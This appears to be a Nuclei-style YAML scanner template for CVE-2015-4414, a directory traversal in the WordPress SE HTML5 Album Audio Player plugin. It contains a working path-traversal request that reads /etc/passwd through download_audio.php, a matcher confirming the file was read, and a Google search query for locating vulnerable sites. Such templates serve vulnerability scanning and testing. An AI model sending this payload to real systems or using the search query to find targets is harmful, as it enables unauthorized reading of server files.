36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
id: CVE-2015-4414
|
|
|
|
info:
|
|
name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/37274
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4414
|
|
- https://www.exploit-db.com/exploits/37274/
|
|
- http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
|
|
classification:
|
|
cve-id: CVE-2015-4414
|
|
metadata:
|
|
google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
|
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/06/08
|